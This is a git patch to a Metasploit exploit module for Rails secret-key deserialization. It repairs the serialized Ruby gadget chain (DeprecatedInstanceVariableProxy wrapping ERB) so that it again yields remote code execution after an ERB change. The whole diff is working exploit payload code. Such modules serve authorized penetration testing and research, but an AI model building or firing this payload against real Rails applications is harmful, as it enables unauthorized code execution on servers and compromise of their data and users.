From 17bad7bd4fa713d44ff25189107fce8066b6b810 Mon Sep 17 00:00:00 2001
From: Justin Steven <justin@justinsteven.com>
Date: Tue, 13 Sep 2016 21:25:14 +1000
Subject: [PATCH] fix popchain

ERB changed as per <https://github.com/ruby/ruby/commit/e82f4195d4>
which broke the popchain used for code execution.
---
 modules/exploits/multi/http/rails_secret_deserialization.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb
index 2a8e05ead6..1efb8df4fb 100644
--- a/modules/exploits/multi/http/rails_secret_deserialization.rb
+++ b/modules/exploits/multi/http/rails_secret_deserialization.rb
@@ -200,8 +200,9 @@ class MetasploitModule < Msf::Exploit::Remote
       return "\x04\b" +
       "o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
         ":\x0E@instanceo" +
-          ":\bERB\x06" +
+          ":\bERB\x07" +
             ":\t@src"+  Marshal.dump(code)[2..-1] +
+            ":\x0c@lineno"+ "i\x00" + 
         ":\f@method:\vresult:" +
         "\x10@deprecatoro:\x1FActiveSupport::Deprecation\x00"
     end
@@ -209,9 +210,10 @@ class MetasploitModule < Msf::Exploit::Remote
       return Rex::Text.encode_base64 "\x04\x08" +
       "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" +
         ":\x0E@instance" +
-          "o"+":\x08ERB"+"\x06" +
+          "o"+":\x08ERB"+"\x07" +
             ":\x09@src" +
               Marshal.dump(code)[2..-1] +
+            ":\x0c@lineno"+ "i\x00" + 
         ":\x0C@method"+":\x0Bresult"
     end
   end